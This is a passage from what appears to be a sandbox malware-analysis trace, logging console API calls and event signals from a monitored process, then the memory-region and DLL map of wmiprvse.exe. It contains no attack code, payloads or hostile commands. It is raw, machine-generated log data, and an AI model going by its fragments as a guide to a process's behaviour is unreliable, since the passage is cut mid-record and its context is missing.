dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.891] GetLastError () returned 0xcb [0160.891] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.891] GetLastError () returned 0xcb [0160.891] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0160.892] GetLastError () returned 0xcb [0160.892] CloseHandle (hObject=0x6b) returned 1 [0160.892] GetLastError () returned 0xcb [0160.896] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.896] GetLastError () returned 0xcb [0160.896] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.896] GetLastError () returned 0xcb [0160.896] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0160.896] GetLastError () returned 0xcb [0160.897] CloseHandle (hObject=0x6b) returned 1 [0160.897] GetLastError () returned 0xcb [0160.901] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.901] GetLastError () returned 0xcb [0160.901] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0160.901] GetLastError () returned 0xcb [0160.901] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0160.902] GetLastError () returned 0xcb [0160.902] CloseHandle (hObject=0x6b) returned 1 [0160.902] GetLastError () returned 0xcb [0160.906] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.906] GetLastError () returned 0xcb [0160.906] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.906] GetLastError () returned 0xcb [0160.906] GetConsoleOutputCP () returned 0x1b5 [0160.906] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.906] GetLastError () returned 0xcb [0160.910] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0160.911] GetLastError () returned 0xcb [0160.911] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.911] GetLastError () returned 0xcb [0160.916] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0160.916] GetLastError () returned 0xcb [0160.916] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.916] GetLastError () returned 0xcb [0160.922] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.959] GetLastError () returned 0xcb [0160.959] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.959] GetLastError () returned 0xcb [0160.959] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0160.959] GetLastError () returned 0xcb [0160.959] CloseHandle (hObject=0x77) returned 1 [0160.959] GetLastError () returned 0xcb [0160.963] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.963] GetLastError () returned 0xcb [0160.963] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.964] GetLastError () returned 0xcb [0160.964] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0160.964] GetLastError () returned 0xcb [0160.964] CloseHandle (hObject=0x77) returned 1 [0160.964] GetLastError () returned 0xcb [0160.968] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.968] GetLastError () returned 0xcb [0160.968] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0160.969] GetLastError () returned 0xcb [0160.969] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2bdb8e0*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bdb8e0*, lpNumberOfCharsWritten=0x5dcea4c*=0x36) returned 1 [0160.969] GetLastError () returned 0xcb [0160.969] CloseHandle (hObject=0x77) returned 1 [0160.969] GetLastError () returned 0xcb [0160.973] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.974] GetLastError () returned 0xcb [0160.974] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.974] GetLastError () returned 0xcb [0160.974] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0160.974] GetLastError () returned 0xcb [0160.974] CloseHandle (hObject=0x77) returned 1 [0160.974] GetLastError () returned 0xcb [0160.978] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.978] GetLastError () returned 0xcb [0160.978] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.979] GetLastError () returned 0xcb [0160.979] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0160.979] GetLastError () returned 0xcb [0160.979] CloseHandle (hObject=0x77) returned 1 [0160.979] GetLastError () returned 0xcb [0160.983] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.983] GetLastError () returned 0xcb [0160.983] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0160.983] GetLastError () returned 0xcb [0160.983] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0160.984] GetLastError () returned 0xcb [0160.984] CloseHandle (hObject=0x77) returned 1 [0160.984] GetLastError () returned 0xcb [0160.988] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.988] GetLastError () returned 0xcb [0160.988] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.989] GetLastError () returned 0xcb [0160.989] GetConsoleOutputCP () returned 0x1b5 [0160.989] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.989] GetLastError () returned 0xcb [0160.992] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0160.992] GetLastError () returned 0xcb [0160.992] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.992] GetLastError () returned 0xcb [0160.996] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0161.032] GetLastError () returned 0xcb [0161.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0161.032] GetLastError () returned 0xcb [0161.035] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.086] GetLastError () returned 0xcb [0161.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0161.087] GetLastError () returned 0xcb [0161.087] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0161.087] GetLastError () returned 0xcb [0161.087] CloseHandle (hObject=0x83) returned 1 [0161.087] GetLastError () returned 0xcb [0161.090] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.091] GetLastError () returned 0xcb [0161.091] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0161.091] GetLastError () returned 0xcb [0161.091] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0161.091] GetLastError () returned 0xcb [0161.091] CloseHandle (hObject=0x83) returned 1 [0161.091] GetLastError () returned 0xcb [0161.094] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.095] GetLastError () returned 0xcb [0161.095] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0161.095] GetLastError () returned 0xcb [0161.095] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2bdbcd8*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bdbcd8*, lpNumberOfCharsWritten=0x5dcea4c*=0x1) returned 1 [0161.095] GetLastError () returned 0xcb [0161.095] CloseHandle (hObject=0x83) returned 1 [0161.095] GetLastError () returned 0xcb [0161.099] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.099] GetLastError () returned 0xcb [0161.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0161.099] GetLastError () returned 0xcb [0161.099] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0161.099] GetLastError () returned 0xcb [0161.099] CloseHandle (hObject=0x83) returned 1 [0161.100] GetLastError () returned 0xcb [0161.103] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.103] GetLastError () returned 0xcb [0161.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0161.103] GetLastError () returned 0xcb [0161.103] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0161.103] GetLastError () returned 0xcb [0161.103] CloseHandle (hObject=0x83) returned 1 [0161.104] GetLastError () returned 0xcb [0161.107] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.107] GetLastError () returned 0xcb [0161.107] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0161.107] GetLastError () returned 0xcb [0161.107] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0161.107] GetLastError () returned 0xcb [0161.107] CloseHandle (hObject=0x83) returned 1 [0161.108] GetLastError () returned 0xcb [0161.111] SetEvent (hEvent=0x324) returned 1 [0161.111] GetLastError () returned 0xcb [0161.111] SetEvent (hEvent=0x34c) returned 1 [0161.111] GetLastError () returned 0xcb [0161.111] SetEvent (hEvent=0x31c) returned 1 [0161.111] GetLastError () returned 0xcb [0161.111] SetEvent (hEvent=0x3b8) returned 1 [0161.111] GetLastError () returned 0xcb [0161.111] SetEvent (hEvent=0x358) returned 1 [0161.111] GetLastError () returned 0xcb [0161.111] SetEvent (hEvent=0x340) returned 1 [0161.111] GetLastError () returned 0xcb [0161.111] SetEvent (hEvent=0x350) returned 1 [0161.111] GetLastError () returned 0xcb [0161.111] SetEvent (hEvent=0x354) returned 1 [0161.111] GetLastError () returned 0xcb [0161.112] SetEvent (hEvent=0x35c) returned 1 [0161.112] GetLastError () returned 0xcb [0161.112] CoUninitialize () Thread: id = 201 os_tid = 0xbb0 [0161.194] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0161.213] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.215] VirtualQuery (in: lpAddress=0x6a8e450, lpBuffer=0x6a8f450, dwLength=0x1c | out: lpBuffer=0x6a8f450*(BaseAddress=0x6a8e000, AllocationBase=0x6100000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.215] VirtualQuery (in: lpAddress=0x6a8e56c, lpBuffer=0x6a8f56c, dwLength=0x1c | out: lpBuffer=0x6a8f56c*(BaseAddress=0x6a8e000, AllocationBase=0x6100000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.259] SetEvent (hEvent=0x390) returned 1 [0161.259] GetLastError () returned 0x0 [0161.259] SetEvent (hEvent=0x394) returned 1 [0161.259] GetLastError () returned 0x0 [0161.259] SetEvent (hEvent=0x3ac) returned 1 [0161.259] GetLastError () returned 0x0 [0161.260] SetEvent (hEvent=0x390) returned 1 [0161.260] GetLastError () returned 0x0 [0161.260] SetEvent (hEvent=0x394) returned 1 [0161.260] GetLastError () returned 0x0 [0161.260] SetEvent (hEvent=0x3dc) returned 1 [0161.260] GetLastError () returned 0x0 [0161.260] SetEvent (hEvent=0x3d0) returned 1 [0161.260] GetLastError () returned 0x0 [0161.260] SetEvent (hEvent=0x3d4) returned 1 [0161.260] GetLastError () returned 0x0 [0161.260] SetEvent (hEvent=0x3d8) returned 1 [0161.260] GetLastError () returned 0x0 [0161.260] SetEvent (hEvent=0x3e0) returned 1 [0161.271] GetLastError () returned 0x0 [0161.271] CoUninitialize () Process: id = "26" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6bbc7000" os_pid = "0xa9c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006044f" [0xc000000f] Region: id = 3594 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3595 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3596 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3597 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3598 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3599 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3600 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3601 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3602 start_va = 0x160000 end_va = 0x166fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3603 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3604 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 3605 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3606 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3607 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3608 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3609 start_va = 0x400000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3610 start_va = 0x590000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 3611 start_va = 0x720000 end_va = 0x7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3612 start_va = 0x850000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 3613 start_va = 0x8d0000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 3614 start_va = 0x950000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 3615 start_va = 0xa50000 end_va = 0xd1efff entry_point = 0xa50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3616 start_va = 0xd20000 end_va = 0x1112fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 3617 start_va = 0x1120000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 3618 start_va = 0x1240000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 3619 start_va = 0x12e0000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 3620 start_va = 0x13f0000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 3621 start_va = 0x14a0000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 3622 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3623 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3624 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3625 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3626 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3627 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3628 start_va = 0xff5e0000 end_va = 0xff63efff entry_point = 0xff5e0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 3629 start_va = 0x7fef5ba0000 end_va = 0x7fef5bb5fff entry_point = 0x7fef5ba0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3630 start_va = 0x7fef5e10000 end_va = 0x7fef5e23fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3631 start_va = 0x7fef6370000 end_va = 0x7fef6396fff entry_point = 0x7fef6370000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3632 start_va = 0x7fef63a0000 end_va = 0x7fef6481fff entry_point = 0x7fef63a0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3633 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3634 start_va = 0x7fefbcd0000 end_va = 0x7fefbd55fff entry_point = 0x7fefbcd0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3635 start_va = 0x7fefbf00000 end_va = 0x7fefbf0efff entry_point = 0x7fefbf00000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3636 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3637 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3638 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3639 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3640 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3641 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3642 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3643 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3644 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3645 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3646 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3647 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3648 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3649 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3650 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3651 start_va = 0x7feffa40000 